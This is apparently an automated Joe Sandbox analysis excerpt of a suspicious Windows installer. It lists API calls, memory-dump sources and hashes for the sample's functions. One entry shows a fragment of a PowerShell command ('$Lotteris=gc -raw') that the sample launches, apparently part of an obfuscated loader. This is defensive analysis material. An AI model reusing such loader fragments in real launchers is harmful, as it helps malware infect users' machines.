                          Download Yara Rule
                          APIs
                          • CreateDirectoryA.KERNELBASE(?,?), ref: 004058D9
                          • GetLastError.KERNEL32 ref: 004058E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CreateDirectoryErrorLast
                          • String ID:
                          • API String ID: 1375471231-0
                          • Opcode ID: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                          • Instruction ID: 6d4ac730157cfa02be50de44a6d7979ff339f577f95dd1204a0ac4d64297c34f
                          • Opcode Fuzzy Hash: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                          • Instruction Fuzzy Hash: A3F0F971C0024DDADB00DFA4D5487DEBBB4AF04305F00802AD841B6280D7B882588B99
                          Function 00401EEA Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(00000000,00000000), ref: 00401F08
                          • EnableWindow.USER32(00000000,00000000), ref: 00401F13
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Window$EnableShow
                          • String ID:
                          • API String ID: 1136574915-0
                          • Opcode ID: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                          • Instruction ID: ee44cb40e53ee45f72a0237e1ac7dd9bbdf9d48109a1395b289766a98c9c438f
                          • Opcode Fuzzy Hash: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                          • Instruction Fuzzy Hash: C9E04872A082049FEF64EBA4FE9556F77F4EB50365B20447FE101F11C2DA7849428A5D
                          Function 00405926 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,?,"$Lotteris=gc -raw ',"$Lotteris=gc -raw ',?, for va",00000000), ref: 0040594F
                          • CloseHandle.KERNEL32(?), ref: 0040595C
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID:
                          • API String ID: 3712363035-0
                          • Opcode ID: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
                          • Instruction ID: 59d3833cbd0ccaca5dcead9257bf18f7f56651039fadea8639d530792baa2c48
                          • Opcode Fuzzy Hash: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
                          • Instruction Fuzzy Hash: 4DE09AB4A00209BFFB109F65AD09F7B776CE704714F418425B914F2151EB7498148A7C
                          Function 00401594 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(00010464), ref: 004015A6
                          • ShowWindow.USER32(0001045E), ref: 004015BB
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          • Opcode ID: 43fc7ab4d8aab13bbe0e3b58b10b50637c22b5aa756d30fe598e07b3bf5632ed
                          • Instruction ID: 6682d38faa1af99df36a0191d691bb63ef923b98cac77dddb2e5d8f8093f9b88
                          • Opcode Fuzzy Hash: 43fc7ab4d8aab13bbe0e3b58b10b50637c22b5aa756d30fe598e07b3bf5632ed
                          • Instruction Fuzzy Hash: 5AE04F727001109FCF64DB94EEA086E73E6E794310360043FD102B3290C6749C068A68
                          Function 004066B5 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                          • GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                            • Part of subcall function 00406647: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                            • Part of subcall function 00406647: wsprintfA.USER32 ref: 00406697
                            • Part of subcall function 00406647: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                          • String ID:
                          • API String ID: 2547128583-0
                          • Opcode ID: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                          • Instruction ID: a472cff2ba870c31c69f4352ad77424fb7bed112d4ffd52c95bf20a34481097e
                          • Opcode Fuzzy Hash: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                          • Instruction Fuzzy Hash: BAE08C73A04210ABD610A6709E0883B73ACAF897413030C3EF952F2240DB3ADC32966E
                          Function 00405E20 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\vfhlZ0vrbe.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                          • Instruction ID: 0febe3887fb1e567d40345103610fd6f3e8d71b3c6328ccb34cdb50f288ecb70
                          • Opcode Fuzzy Hash: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                          • Instruction Fuzzy Hash: 23D09E31254301AFEF099F20DE16F2E7AA2EB84B00F11952CB682A41E0DA7158299B15
                          Function 00405DFB Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesA.KERNELBASE(?,?,00405A13,?,?,00000000,00405BF6,?,?,?,?), ref: 00405E00
                          • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405E14
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                          • Instruction ID: f779a6514c6a4e708396d8c5aab00734bb1243d63453d3b06c62658839fa2b1d
                          • Opcode Fuzzy Hash: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                          • Instruction Fuzzy Hash: 20D0C9725056206BC2103B28EE0889BBB55DB542717028B35F9A9A22B0CB304C668B98
                          Function 004039BC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                          Download Yara Rule
                          APIs
                          • CloseHandle.KERNEL32(FFFFFFFF,004037BF,?,?,00000008,0000000A,0000000C), ref: 004039C7
                          Strings
                          • C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\, xrefs: 004039DB
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\
                          • API String ID: 2962429428-46641210
                          • Opcode ID: 690aa45f0be1a931a0176c4e0d9fa5981e6643ccd20a8d7c7662d168512a01e4
                          • Instruction ID: afeb4de79f0a024d8aad6c8bb86ec84bc3369b341d6032a4bf43371fdf378432
                          • Opcode Fuzzy Hash: 690aa45f0be1a931a0176c4e0d9fa5981e6643ccd20a8d7c7662d168512a01e4
                          • Instruction Fuzzy Hash: B1C0223020030066C0206F788E8F5483A045740339BA18336F0B8F04F1CB3C068C0D5D
                          Function 004058F1 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • CreateDirectoryA.KERNELBASE(?,00000000,004033CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004058F7
                          • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405905
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CreateDirectoryErrorLast
                          • String ID:
                          • API String ID: 1375471231-0
                          • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                          • Instruction ID: 226d66ac6a6a747d722d053d5b09978fff7ae735be90135577c6d3bd4ef0b281
                          • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                          • Instruction Fuzzy Hash: F9C04CB120490ADED6505B319F0971B7A51AB50751F175839A586E40A0DB348455DD2E
                          Function 0040168F Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                          Download Yara Rule
                          APIs
                          • MoveFileA.KERNEL32(00000000,00000000), ref: 004016AA
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: FileMove
                          • String ID:
                          • API String ID: 3562171763-0
                          • Opcode ID: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                          • Instruction ID: 67493920040547a329b99de5d89bb6d269ebd8b6645208cc7e8d7a7b283b3978
                          • Opcode Fuzzy Hash: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                          • Instruction Fuzzy Hash: 09F0B431608125A7DF20BB765F5DE5F52A49B41378B20423BF212B21D1DABDC643856E
                          Function 004023C9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402402
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: PrivateProfileStringWrite
                          • String ID:
                          • API String ID: 390214022-0
                          • Opcode ID: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                          • Instruction ID: f24de8215b53ecbcf80a61348f6bfc7870897c54b3e6c90e9d08f7162164e460
                          • Opcode Fuzzy Hash: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                          • Instruction Fuzzy Hash: 9DE04F3160413A6BEB6036B11F8D97F2159AB84314B14053EBA11B62C6D9FC8E8352A9
                          Function 00406141 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402D0F,00000000,?,?), ref: 0040616A
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                          • Instruction ID: bbdc12591f07ec5b960d4a172b59ed2570ed34ba37628b65f55bcc9503456b15
                          • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                          • Instruction Fuzzy Hash: 7AE0E6B2020109BEEF099F60DC1AD7B772DE708310F01492EFA06D4151E6B5E9705634
                          Function 00401744 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                          Download Yara Rule
                          APIs
                          • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401758
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: PathSearch
                          • String ID:
                          • API String ID: 2203818243-0
                          • Opcode ID: 4205dc15fe547f27f479e1deebd95f86bdda3a1c9deaf9bd02e28dbd9a4af209
                          • Instruction ID: 05024ed45ffdbec093a2934bfd596ec6e4c724010b47aa93efab37ffede3367c
                          • Opcode Fuzzy Hash: 4205dc15fe547f27f479e1deebd95f86bdda3a1c9deaf9bd02e28dbd9a4af209
                          • Instruction Fuzzy Hash: A5E0D871304100EFEB10CB649D48AAB3798DB10368B30453AE501A20C2D5B58946872C
                          Function 00405EC7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                          Download Yara Rule
                          APIs
                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403343,00000000,0041D440,000000FF,0041D440,000000FF,000000FF,00000004,00000000), ref: 00405EDB
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                          • Instruction ID: 0d77a24040528495e1d5683a333844bda4a24a81b27895c3293bddb668a77566
                          • Opcode Fuzzy Hash: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                          • Instruction Fuzzy Hash: 20E0EC3221065EABDF509F55DC00EEB7B6CEB05360F004837F965E2150D631EA219BE9
                          Function 00405E98 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                          Download Yara Rule
                          APIs
                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040338D,00000000,00000000,004031B7,000000FF,00000004,00000000,00000000,00000000), ref: 00405EAC
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                          • Instruction ID: c4f2c5db2c8838af9825f3b875f3a0ad88d5b51994199861a780369f0be58439
                          • Opcode Fuzzy Hash: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                          • Instruction Fuzzy Hash: E4E04F32210619ABDF109F60DC04EAB3B6CEB00351F000432F954E2140D230E9118AE4
                          Function 0040240D Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
